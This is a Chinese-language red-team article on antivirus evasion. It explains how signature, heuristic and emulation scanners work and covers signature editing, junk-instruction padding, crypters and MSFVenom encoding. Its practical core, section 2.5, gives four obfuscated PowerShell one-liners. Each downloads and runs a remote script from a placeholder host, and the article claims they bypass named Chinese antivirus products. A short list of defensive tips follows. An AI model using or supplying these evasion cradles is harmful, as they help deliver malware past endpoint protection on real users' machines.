红队攻防之免杀技术全面解析

一、杀毒软件工作原理

现代杀毒软件主要基于三个核心组件：扫描器、病毒库和虚拟机。主流杀毒软件如360、腾讯电脑管家、火绒剑、金山毒霸、瑞星等都采用这些技术。

1.1 基于特征码的静态扫描技术

• 原理：通过匹配文件中的特征字符串识别病毒
• 特点：第一代杀毒技术，对现代变种病毒效果有限
• 示例：检测文件中"灰鸽子上线成功"等特定字符串

1.2 启发式扫描技术

• 原理：分析指令顺序或特定行为组合判断病毒
• 特点：能检测未知病毒，采用打分机制
• 评分示例：
  • 系统目录释放文件：20分
  • 分区格式化：100分
  • 修改启动项：50分
• 达到预设分值即判定为病毒

1.3 虚拟机技术

• 原理：创建虚拟执行环境分析可疑代码行为
• 工作流程：
  1. 读取病毒入口代码
  2. 解释执行解密段
  3. 在解密后代码中查找特征码
• 目的：专门对付加密变形病毒

二、免杀技术详解

2.1 修改特征码技术

• 方法一：直接更改特征字符串
  • 示例：将"灰鸽子上线成功"改为其他无害文本
• 方法二：改变校验和
  • 原理：修改特定区域使校验和变化
  • 效果：欺骗基于校验和的检测机制

2.2 花指令免杀

• 原理：在shellcode或特征区域插入无意义指令
• 特点：
  • 不改变程序逻辑
  • 阻碍反编译
  • 利用杀软检测偏移范围特性
• 效果：通过大量填充干扰特征码识别

2.3 加壳免杀

• 有效壳类型：加密壳（非普通压缩壳如UPX、ASPack）
• 现状：
  • 加密壳可掩盖大部分特征码
  • 但现代杀软会直接标记加壳文件为可疑
  • 使用冷门加密壳可能有效
• 局限性：随着虚拟机技术和内存监测发展，效果降低

2.4 二次编译技术

• MSFVenom应用：
  • 提供多种payload和encoder
  • shikata_ga_nai是MSF中评价为excellent的编码器
  • 支持多态编码（每次生成不同载荷）
  • 支持管道多重编码
• 现状：
  • MSF的encoder特征已被杀软广泛识别
  • 需结合C/C#/Python等进行二次编码

2.5 PowerShell免杀技术

2.5.1 DownloadString函数拆分

cmd /c echo $c1='IEX(New-Object Net.WebClient).Downlo';$c2='123(''http://XX.XX.XX.XX/test.ps1'')'.Replace('123','adString');IEX ($c1+$c2) | powershell -

• 效果：绕过最新版火绒和360 12.X版本

2.5.2 HTTP关键字拆分

powershell "$a='IEX((New-Object Net.WebClient).DownloadString(''ht';$b='tp://XX.XX.XX.XX/test.ps1''))';IEX ($a+$b)"

• 特点：拆分http协议标识符

2.5.3 中文引号绕过

powershell "IEX ((new-object net.webclient).downloadstring('ht'+'tp://XX.XX.XX.XX/test.ps1'))"

• 技巧：使用中文引号干扰检测

2.5.4 IEX替换+HTTP拆分

powershell "$a='123((New-Object Net.WebClient).DownloadString(''ht'.Replace('123','IEX');$b='tp://XX.XX.XX.XX/test.ps1''))';IEX ($a+$b)"

• 效果：绕过最新版火绒

三、技术演进与对抗趋势

1. 特征码技术从简单字符串匹配发展到多维度检测
2. 启发式分析使静态特征免杀效果降低
3. 行为检测和沙箱技术提高了动态分析的准确性
4. 机器学习应用于恶意软件检测
5. 免杀技术从单一方法发展为多技术组合

四、防御建议

1. 采用多层防御策略，不依赖单一检测技术
2. 定期更新病毒库和检测引擎
3. 监控异常进程和网络连接
4. 限制PowerShell等脚本执行权限
5. 实施应用程序白名单策略

五、总结

免杀技术是红队攻防中的重要环节，随着安全防护技术的进步，免杀方法也在不断演进。了解这些技术原理有助于更好地防御高级威胁。有效的安全防护需要结合静态检测、动态行为分析和威胁情报等多维度手段。